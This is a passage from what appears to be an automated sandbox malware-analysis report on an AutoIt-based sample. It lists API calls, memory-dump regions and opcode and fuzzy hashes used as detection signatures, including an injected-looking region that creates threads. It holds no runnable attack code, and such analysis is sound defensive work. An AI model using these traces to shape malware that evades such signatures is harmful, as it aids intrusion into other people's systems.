                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                      • String ID:
                      • API String ID: 2782032738-0
                      • Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                      • Instruction ID: 7e2b6cc7ad03bd9c76499a1e37937a2f988b0f8539bc111f38111bac958280d8
                      • Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                      • Instruction Fuzzy Hash: 9341D434B006659BDB189F69E88096F7BA5EFC2364B50813FE82587640DB78DD418B48
                      APIs
                      • SetFilePointerEx.KERNEL32 ref: 02F5B2BA
                      • WriteFile.KERNEL32(?,?,00000004,?,00000000), ref: 02F5B2E0
                      Memory Dump Source
                      • Source File: 00000000.00000002.1481149798.0000000002F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2f50000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: File$PointerWrite
                      • String ID:
                      • API String ID: 539440098-0
                      • Opcode ID: 29836c3b7a5efa2b2ea9f813b61672824d9de1df1498a6e0ee4eba125ad84e8d
                      • Instruction ID: e1cbd5545c26583b00554aece137add99e18aba717573ec057ae08a938aee31b
                      • Opcode Fuzzy Hash: 29836c3b7a5efa2b2ea9f813b61672824d9de1df1498a6e0ee4eba125ad84e8d
                      • Instruction Fuzzy Hash: 5231A77190C3649EE7118B25C81572FBFE06F8269CF48854DEFD496289D3B58408CB63
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: _memmove
                      • String ID: AU3!P/I$EA06
                      • API String ID: 4104443479-1914660620
                      • Opcode ID: a4a93ea115200c971a8861d8d6b54e97b5cb82f41a73f581a0e127d2f66012de
                      • Instruction ID: ff6ab1fe0fa27ea81cbcababf34b5742e04188ff143208347500ec0318cc5285
                      • Opcode Fuzzy Hash: a4a93ea115200c971a8861d8d6b54e97b5cb82f41a73f581a0e127d2f66012de
                      • Instruction Fuzzy Hash: F1418AB1A0415867DB219B6498517BF7BA19FC5304F28407BEE82BB3C2D63C5D4583AA
                      APIs
                      • _memset.LIBCMT ref: 0043EA39
                      • GetOpenFileNameW.COMDLG32(?), ref: 0043EA83
                        • Part of subcall function 00404750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00404743,?,?,004037AE,?), ref: 00404770
                        • Part of subcall function 00420791: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 004207B0
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Name$Path$FileFullLongOpen_memset
                      • String ID: X
                      • API String ID: 3777226403-3081909835
                      • Opcode ID: f7a2dfced1c7fac4da1122c6cfde17308801e93c3a8658db5658365851755d62
                      • Instruction ID: baa1e7331fae4d359aac7897d23b5e8ce5a65ce190648e6f88e75d23560a4c0c
                      • Opcode Fuzzy Hash: f7a2dfced1c7fac4da1122c6cfde17308801e93c3a8658db5658365851755d62
                      • Instruction Fuzzy Hash: 4421A471A102589BCB41DF95D845BDE7BF8AF49314F00806FE508B7281DBB85989CFAA
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: __fread_nolock_memmove
                      • String ID: EA06
                      • API String ID: 1988441806-3962188686
                      • Opcode ID: 12b9eb2746c946ee24d761f12b33ae587f64773302ff2959e1666c5e9a364bcc
                      • Instruction ID: 3cd15271acb3b06ac884f373c06a49f445b450121f82016c471601618c020999
                      • Opcode Fuzzy Hash: 12b9eb2746c946ee24d761f12b33ae587f64773302ff2959e1666c5e9a364bcc
                      • Instruction Fuzzy Hash: 8F01F9719042287EDB18CAA9D816EFE7BFCDB11301F00459FF552D2181E878E6048764
                      APIs
                      • GetTempPathW.KERNEL32(00000104,?), ref: 004698F8
                      • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 0046990F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Temp$FileNamePath
                      • String ID: aut
                      • API String ID: 3285503233-3010740371
                      • Opcode ID: d3e801ab242beb6fec4b4f89e1aaff04be832202f3ef9fc21f6b566375e79959
                      • Instruction ID: d76eb4abf93f0e171a782776cb2de2514a1bc3ee8d101bd4a6c1c3d5b9ef8161
                      • Opcode Fuzzy Hash: d3e801ab242beb6fec4b4f89e1aaff04be832202f3ef9fc21f6b566375e79959
                      • Instruction Fuzzy Hash: D0D05E7954030DABDB50ABA0DC0EFDA773CE704700F0006F5BA54D10A1EAB1A5988BA9
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e563156e91e36691d5f4fcac2aaf6be647dac8c86d34431775506fe1d7328f76
                      • Instruction ID: 208f182f3c9136cc863dec11eab3d0960db0a10b8073f2b3425ab1c058278d8f
                      • Opcode Fuzzy Hash: e563156e91e36691d5f4fcac2aaf6be647dac8c86d34431775506fe1d7328f76
                      • Instruction Fuzzy Hash: 8AF13A716083019FC714DF29C480A6ABBE5FF88318F54892EF8999B392D734E945CF86
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1481149798.0000000002F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2f50000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: ComputerName
                      • String ID:
                      • API String ID: 3545744682-0
                      • Opcode ID: 09e8a2b1c0852702022cd97730217519c9d7ed83a0ef821d4325b0a77c5d0e76
                      • Instruction ID: 154236f2239b67ec38df89099c3b24bb58314f863a225c758a3658d95b412f27
                      • Opcode Fuzzy Hash: 09e8a2b1c0852702022cd97730217519c9d7ed83a0ef821d4325b0a77c5d0e76
                      • Instruction Fuzzy Hash: AB212531E693406BFA3576148C0AFB5FB356B51BD4F88448BE78B561E1D3A46818C263
                      APIs
                      • _memset.LIBCMT ref: 00404370
                      • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00404415
                      • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00404432
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: IconNotifyShell_$_memset
                      • String ID:
                      • API String ID: 1505330794-0
                      • Opcode ID: 55e578eaf81f1082cb721cb8179a93cbba9ea3621e04278649df261dfa9eaab8
                      • Instruction ID: 448a70bf35e4549ae47872dc9eb977fea889799f7ce089bf6dae1479d4278b9a
                      • Opcode Fuzzy Hash: 55e578eaf81f1082cb721cb8179a93cbba9ea3621e04278649df261dfa9eaab8
                      • Instruction Fuzzy Hash: 4E3184B05047019FD760DF24D884A9BBBF8FB98308F00093FEA9A92391D7746944CB5A
                      APIs
                      • __FF_MSGBANNER.LIBCMT ref: 00425733
                        • Part of subcall function 0042A16B: __NMSG_WRITE.LIBCMT ref: 0042A192
                        • Part of subcall function 0042A16B: __NMSG_WRITE.LIBCMT ref: 0042A19C
                      • __NMSG_WRITE.LIBCMT ref: 0042573A
                        • Part of subcall function 0042A1C8: GetModuleFileNameW.KERNEL32(00000000,004C33BA,00000104,00000000,00000001,00000000), ref: 0042A25A
                        • Part of subcall function 0042A1C8: ___crtMessageBoxW.LIBCMT ref: 0042A308
                        • Part of subcall function 0042309F: ___crtCorExitProcess.LIBCMT ref: 004230A5
                        • Part of subcall function 0042309F: ExitProcess.KERNEL32 ref: 004230AE
                        • Part of subcall function 00428B28: __getptd_noexit.LIBCMT ref: 00428B28
                      • RtlAllocateHeap.NTDLL(00AA0000,00000000,00000001,?,00000000,00000001,?,00420DD3,?,00000000,%I,?,00409E8C,?,?,?), ref: 0042575F
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                      • String ID:
                      • API String ID: 1372826849-0
                      • Opcode ID: 173bc1eb0939af60788e3920f729a181213a4711687b08a62f5fb4dd74449d1b
                      • Instruction ID: 12628286b9c33790f0bcaf27d243d0f78d5a939af01e39ac9af769d2403f214a
                      • Opcode Fuzzy Hash: 173bc1eb0939af60788e3920f729a181213a4711687b08a62f5fb4dd74449d1b
                      • Instruction Fuzzy Hash: 8101D235380B31DADA102B36BC42A2E67588BC2766FD0043FF9059A281DE7C9D01866D
                      APIs
                      • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00469548,?,?,?,?,?,00000004), ref: 004698BB
                      • SetFileTime.KERNEL32(00000000,?,00000000,?,?,00469548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 004698D1
                      • CloseHandle.KERNEL32(00000000,?,00469548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 004698D8
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                       • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: File$CloseCreateHandleTime
                      • String ID:
                      • API String ID: 3397143404-0
                      • Opcode ID: bd87c49bddbed0dd2230edd6d70eff61a4bb717c0cd42ce1b208173b53aacf55
                      • Instruction ID: c759ec0fed9c3a555ac5ec6521767d99e991bc38b38178bd45d0c2782cb34c4e
                      • Opcode Fuzzy Hash: bd87c49bddbed0dd2230edd6d70eff61a4bb717c0cd42ce1b208173b53aacf55
                      • Instruction Fuzzy Hash: 6EE08632140214B7D7212B54EC0DFDE7B19EB06760F144535FF14A90E087B12925979C
                      APIs
                      • _free.LIBCMT ref: 00468D1B
                        • Part of subcall function 00422D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00429A24), ref: 00422D69
                        • Part of subcall function 00422D55: GetLastError.KERNEL32(00000000,?,00429A24), ref: 00422D7B
                      • _free.LIBCMT ref: 00468D2C
                      • _free.LIBCMT ref: 00468D3E
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                       • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: _free$ErrorFreeHeapLast
                      • String ID:
                      • API String ID: 776569668-0
                      • Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                      • Instruction ID: 6b151060fb8ed88ed9ffdc5938a612973e117ec8253147f08314cae1c0c73c84
                      • Opcode Fuzzy Hash: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                      • Instruction Fuzzy Hash: 10E0C2B170171253CB20A579BA40A8313DC4F4C3967440A0FB40DD7282DEACF842803C
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                       • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID:
                      • String ID: CALL
                      • API String ID: 0-4196123274
                      • Opcode ID: 5bf3d3e503f066cbafa41f3544c44b9081dacd38a66df359d0391d9f4f69c0c6
                      • Instruction ID: c803bb07f2a617980fc862d1973d54e65b33ee20ceb4547c7cbfd92c67e19f3b
                      • Opcode Fuzzy Hash: 5bf3d3e503f066cbafa41f3544c44b9081dacd38a66df359d0391d9f4f69c0c6
                      • Instruction Fuzzy Hash: 8A225B70608301DFD724DF14C454A6AB7E1FF44308F15896EE98AAB3A2D739EC55CB8A
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                       • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: _memmove
                      • String ID:
                      • API String ID: 4104443479-0
                      • Opcode ID: 3ce2611c78d194cda31788c7b8dd167ac83d19a30fb3eaa8f098f7f363491ca2
                      • Instruction ID: 665aeeeda7618be144ab26ba5ea9c3b14b1a5e971dff4faecb2a1d88e99e5761
                      • Opcode Fuzzy Hash: 3ce2611c78d194cda31788c7b8dd167ac83d19a30fb3eaa8f098f7f363491ca2
                      • Instruction Fuzzy Hash: 8841D7716082059BCB10FFA9D8859BAB7E8EF49308B64445FE14597382EF3D9C05CB6A
                      APIs
                      • CreateThread.KERNEL32(00000000,00000000,02F555C0,?,00000000,00000000), ref: 02F55A51
                      • RtlExitUserThread.NTDLL(00000000), ref: 02F55B11
                      Memory Dump Source
                      • Source File: 00000000.00000002.1481149798.0000000002F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2f50000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Thread$CreateExitUser
                      • String ID:
                      • API String ID: 4108186749-0
                      • Opcode ID: 306cf5efd16a80837d24ae19c4bcc8c2aebeac02ccfbceb494f80553819726c1
                      • Instruction ID: 8ee4efddbf3c7be0008a1fdc09f3ace6e368ee3396ee45111ab40a2c9cb670e5
                      • Opcode Fuzzy Hash: 306cf5efd16a80837d24ae19c4bcc8c2aebeac02ccfbceb494f80553819726c1
                      • Instruction Fuzzy Hash: 9F115951D0D3E24EE7278B788829366BFA01F536A8F8902C6DB918E1E3D359454D87A3
                      APIs
                      • IsThemeActive.UXTHEME ref: 00404834
                        • Part of subcall function 0042336C: __lock.LIBCMT ref: 00423372
                        • Part of subcall function 0042336C: DecodePointer.KERNEL32(00000001,?,00404849,00457C74), ref: 0042337E
                        • Part of subcall function 0042336C: EncodePointer.KERNEL32(?,?,00404849,00457C74), ref: 00423389
                        • Part of subcall function 004048FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00404915
                        • Part of subcall function 004048FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040492A
                        • Part of subcall function 00403B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00403B68
                        • Part of subcall function 00403B3A: IsDebuggerPresent.KERNEL32 ref: 00403B7A
                        • Part of subcall function 00403B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,004C52F8,004C52E0,?,?), ref: 00403BEB
                        • Part of subcall function 00403B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00403C6F
                      • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00404874
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                       • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                      • String ID:
                      • API String ID: 1438897964-0
                      • Opcode ID: 13bbe0c74f5194e49c071aa5a0b14ab81aac5f2f5d26dabd82ae82306b4d1084
                      • Instruction ID: 9525eea27cfe2a06ee6bb0b94f8a439f0fec78f72a1223afaaa4f4cc7b3f6ca0
                      • Opcode Fuzzy Hash: 13bbe0c74f5194e49c071aa5a0b14ab81aac5f2f5d26dabd82ae82306b4d1084
                      • Instruction Fuzzy Hash: 96118E729143019BC700EF69E80591EBBE8EB95754F10893FF440932B2DB749A49CB9E
                      APIs
                      • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,00405821,?,?,?,?), ref: 00405CC7
                      • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,00405821,?,?,?,?), ref: 0043DD73
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                       • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: CreateFile
                      • String ID:
                      • API String ID: 823142352-0
                      • Opcode ID: aed05ab6a1b88559d57bbe8f1293197c90d85f92c05dbd21c07c0e87b90c3386
                      • Instruction ID: 3e9ad2372c7cfb2b297ed5c82f770502f6fc7a31e1f40b0728b8e52e39df89fe
                      • Opcode Fuzzy Hash: aed05ab6a1b88559d57bbe8f1293197c90d85f92c05dbd21c07c0e87b90c3386
                      • Instruction Fuzzy Hash: 9A018870144708BEF7201E24CC8AF673ADCEB05768F10832AFAD56A1D0C6B81C458F58
                      APIs
                        • Part of subcall function 0042571C: __FF_MSGBANNER.LIBCMT ref: 00425733
                        • Part of subcall function 0042571C: __NMSG_WRITE.LIBCMT ref: 0042573A
                        • Part of subcall function 0042571C: RtlAllocateHeap.NTDLL(00AA0000,00000000,00000001,?,00000000,00000001,?,00420DD3,?,00000000,%I,?,00409E8C,?,?,?), ref: 0042575F
                      • std::exception::exception.LIBCMT ref: 00420DEC
                      • __CxxThrowException@8.LIBCMT ref: 00420E01
                        • Part of subcall function 0042859B: RaiseException.KERNEL32(?,?,00000000,004B9E78,?,00000001,?,?,?,00420E06,00000000,004B9E78,00409E8C,00000001), ref: 004285F0
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                       • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                      • String ID:
                      • API String ID: 3902256705-0
                      • Opcode ID: f9d52615186fd6d384fb15de7d7a4816dfb19e9dc7db00e42ce54749fafe4e8e
                      • Instruction ID: 7ce0db18d3e86308d2e94e4ef4c1f65fcbea9f9514d772724804ad69f7891851
                      • Opcode Fuzzy Hash: f9d52615186fd6d384fb15de7d7a4816dfb19e9dc7db00e42ce54749fafe4e8e
                      • Instruction Fuzzy Hash: BAF0863560223976CB10BA95FD015DF7BE89F01315F90452FF90496282DFB89A8091DD
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                       • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
